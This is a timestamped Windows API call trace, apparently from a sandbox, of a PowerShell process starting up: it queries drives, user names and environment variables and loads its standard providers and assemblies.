	[0849.003] SetErrorMode (uMode=0x1) returned 0x1
	[0849.003] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x1cd5a0 | out: lpFileInformation=0x1cd5a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0849.003] SetErrorMode (uMode=0x1) returned 0x1
	[0849.004] GetLogicalDrives () returned 0x4
	[0849.005] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1cd100, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0849.009] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0849.009] SetErrorMode (uMode=0x1) returned 0x1
	[0849.010] CoTaskMemAlloc (cb=0x68) returned 0x1b8ef870
	[0849.010] CoTaskMemAlloc (cb=0x68) returned 0x1b8ef8e0
	[0849.010] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1b8ef870, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x1cd570, lpMaximumComponentLength=0x1cd56c, lpFileSystemFlags=0x1cd568, lpFileSystemNameBuffer=0x1b8ef8e0, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1cd570*=0x9c354b42, lpMaximumComponentLength=0x1cd56c*=0xff, lpFileSystemFlags=0x1cd568*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0849.010] CoTaskMemFree (pv=0x1b8ef870) 
	[0849.010] CoTaskMemFree (pv=0x1b8ef8e0) 
	[0849.010] SetErrorMode (uMode=0x1) returned 0x1
	[0849.010] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0849.012] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1cd2b0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0849.012] SetErrorMode (uMode=0x1) returned 0x1
	[0849.012] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1cd510 | out: lpFileInformation=0x1cd510*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0849.012] SetErrorMode (uMode=0x1) returned 0x1
	[0849.012] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1cd2b0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0849.012] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1cd160, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0849.012] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0849.013] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1cd090, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0849.013] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0849.013] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1cd0e0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0849.014] SetErrorMode (uMode=0x1) returned 0x1
	[0849.014] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1cd340 | out: lpFileInformation=0x1cd340*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0849.014] SetErrorMode (uMode=0x1) returned 0x1
	[0849.014] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1cd0e0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0849.014] SetErrorMode (uMode=0x1) returned 0x1
	[0849.014] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1cd340 | out: lpFileInformation=0x1cd340*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0849.014] SetErrorMode (uMode=0x1) returned 0x1
	[0849.014] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1cd180, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0849.014] SetErrorMode (uMode=0x1) returned 0x1
	[0849.014] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1cd3e0 | out: lpFileInformation=0x1cd3e0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0849.015] SetErrorMode (uMode=0x1) returned 0x1
	[0849.015] CoTaskMemAlloc (cb=0x804) returned 0x1b905360
	[0849.015] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b905360, nSize=0x1cd7e8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1cd7e8) returned 0x1
	[0849.015] CoTaskMemFree (pv=0x1b905360) 
	[0849.015] CoTaskMemAlloc (cb=0x204) returned 0x269740
	[0849.015] GetUserNameW (in: lpBuffer=0x269740, pcbBuffer=0x1cd828 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1cd828) returned 1
	[0849.016] CoTaskMemFree (pv=0x269740) 
	[0849.016] ReportEventW (hEventLog=0x1b9d0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x303f200*="FileSystem", lpRawData=0x303ef90) returned 1
	[0849.119] CoTaskMemAlloc (cb=0x104) returned 0x2d4f30
	[0849.119] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d4f30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0849.119] CoTaskMemFree (pv=0x2d4f30) 
	[0849.121] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0849.121] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0849.121] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0849.121] CoTaskMemAlloc (cb=0x804) returned 0x1b905360
	[0849.121] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b905360, nSize=0x1cd7e8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1cd7e8) returned 0x1
	[0849.122] CoTaskMemFree (pv=0x1b905360) 
	[0849.122] CoTaskMemAlloc (cb=0x204) returned 0x269740
	[0849.122] GetUserNameW (in: lpBuffer=0x269740, pcbBuffer=0x1cd828 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1cd828) returned 1
	[0849.122] CoTaskMemFree (pv=0x269740) 
	[0849.123] ReportEventW (hEventLog=0x1b9d0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3044a40*="Function", lpRawData=0x30447d0) returned 1
	[0850.339] CoTaskMemAlloc (cb=0x104) returned 0x2d4f30
	[0850.339] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d4f30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0850.339] CoTaskMemFree (pv=0x2d4f30) 
	[0850.347] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0850.347] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0850.347] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0850.347] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0850.374] CoTaskMemAlloc (cb=0x804) returned 0x1b905360
	[0852.216] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b905360, nSize=0x1cd7e8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1cd7e8) returned 0x1
	[0852.217] CoTaskMemFree (pv=0x1b905360) 
	[0852.217] CoTaskMemAlloc (cb=0x204) returned 0x269740
	[0852.217] GetUserNameW (in: lpBuffer=0x269740, pcbBuffer=0x1cd828 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1cd828) returned 1
	[0852.218] CoTaskMemFree (pv=0x269740) 
	[0852.218] ReportEventW (hEventLog=0x1b9d0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3067268*="Registry", lpRawData=0x3066ff8) returned 1
	[0852.843] CoTaskMemAlloc (cb=0x804) returned 0x1b905360
	[0852.843] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b905360, nSize=0x1cd7e8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1cd7e8) returned 0x1
	[0852.843] CoTaskMemFree (pv=0x1b905360) 
	[0852.844] CoTaskMemAlloc (cb=0x204) returned 0x269740
	[0852.844] GetUserNameW (in: lpBuffer=0x269740, pcbBuffer=0x1cd828 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1cd828) returned 1
	[0852.844] CoTaskMemFree (pv=0x269740) 
	[0852.844] ReportEventW (hEventLog=0x1b9d0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x306c680*="Variable", lpRawData=0x306c410) returned 1
	[0852.894] CoTaskMemAlloc (cb=0x104) returned 0x2d4f30
	[0852.894] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d4f30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0852.894] CoTaskMemFree (pv=0x2d4f30) 
	[0852.897] CoTaskMemAlloc (cb=0x104) returned 0x2d4f30
	[0852.897] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d4f30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0852.897] CoTaskMemFree (pv=0x2d4f30) 
	[0852.899] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1cd090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0852.899] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1ccfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0852.900] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1ccfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0852.900] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1ccfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0855.779] CoTaskMemAlloc (cb=0x804) returned 0x1b905360
	[0855.779] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b905360, nSize=0x1cd7e8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1cd7e8) returned 0x1
	[0855.779] CoTaskMemFree (pv=0x1b905360) 
	[0855.779] CoTaskMemAlloc (cb=0x204) returned 0x269740
	[0855.779] GetUserNameW (in: lpBuffer=0x269740, pcbBuffer=0x1cd828 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1cd828) returned 1
	[0855.779] CoTaskMemFree (pv=0x269740) 
	[0855.780] ReportEventW (hEventLog=0x1b9d0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x30804d8*="Certificate", lpRawData=0x3080268) returned 1
	[0855.954] CoTaskMemAlloc (cb=0x104) returned 0x2d4f30
	[0855.954] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d4f30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0855.954] CoTaskMemFree (pv=0x2d4f30) 
	[0855.958] GetLogicalDrives () returned 0x4
	[0855.958] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1cd470, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0855.958] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0855.960] CoTaskMemAlloc (cb=0x20e) returned 0x2bcd20
	[0855.960] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x2bcd20 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0855.960] CoTaskMemFree (pv=0x2bcd20) 
	[0855.961] CoTaskMemAlloc (cb=0x104) returned 0x2d4f30
	[0855.961] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d4f30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0855.962] CoTaskMemFree (pv=0x2d4f30) 
	[0855.962] CoTaskMemAlloc (cb=0x104) returned 0x2d4f30
	[0855.962] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d4f30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0855.962] CoTaskMemFree (pv=0x2d4f30) 
	[0855.987] CoTaskMemAlloc (cb=0x104) returned 0x2d4f30
	[0855.987] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d4f30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0855.987] CoTaskMemFree (pv=0x2d4f30) 
	[0855.988] CoTaskMemAlloc (cb=0x104) returned 0x2d4f30
	[0855.988] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d4f30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0855.988] CoTaskMemFree (pv=0x2d4f30) 
	[0855.989] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1cd1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0855.989] SetErrorMode (uMode=0x1) returned 0x1
	[0855.989] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1cd430 | out: lpFileInformation=0x1cd430*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0855.989] SetErrorMode (uMode=0x1) returned 0x1
	[0855.989] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1cd1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0855.989] SetErrorMode (uMode=0x1) returned 0x1
	[0855.989] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1cd430 | out: lpFileInformation=0x1cd430*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0855.989] SetErrorMode (uMode=0x1) returned 0x1
	[0855.990] CoTaskMemAlloc (cb=0x104) returned 0x2d4f30
	[0855.990] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d4f30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0855.990] CoTaskMemFree (pv=0x2d4f30) 
	[0857.522] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1cd370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0861.343] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1cd490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0861.343] SetErrorMode (uMode=0x1) returned 0x1
	[0861.343] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1cd6f0 | out: lpFileInformation=0x1cd6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0861.343] SetErrorMode (uMode=0x1) returned 0x1
	[0861.352] CoTaskMemAlloc (cb=0x804) returned 0x1b905360
	[0861.352] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b905360, nSize=0x1cda58 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1cda58) returned 0x1
	[0861.353] CoTaskMemFree (pv=0x1b905360) 
	[0861.353] CoTaskMemAlloc (cb=0x204) returned 0x269740
	[0861.353] GetUserNameW (in: lpBuffer=0x269740, pcbBuffer=0x1cda98 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1cda98) returned 1
	[0861.353] CoTaskMemFree (pv=0x269740) 
	[0861.353] ReportEventW (hEventLog=0x1b9d0008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x30b91c0*="Available", lpRawData=0x30b8f50) returned 1
	[0862.325] CoTaskMemAlloc (cb=0x104) returned 0x2d4f30
	[0862.325] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d4f30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0862.325] CoTaskMemFree (pv=0x2d4f30) 
	[0862.325] CoTaskMemAlloc (cb=0x104) returned 0x2d4f30
	[0862.325] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d4f30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0862.325] CoTaskMemFree (pv=0x2d4f30) 
	[0862.327] CoTaskMemAlloc (cb=0x104) returned 0x2d4f30
	[0862.327] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x2d4f30, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0862.327] CoTaskMemFree (pv=0x2d4f30) 
	[0862.327] CoTaskMemAlloc (cb=0x104) returned 0x2d4f30
	[0862.327] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x2d4f30, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0862.328] CoTaskMemFree (pv=0x2d4f30) 
	[0862.331] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0862.331] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0862.331] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0862.332] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0862.332] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0862.333] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0862.333] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0862.333] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0862.334] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0862.334] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0862.334] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
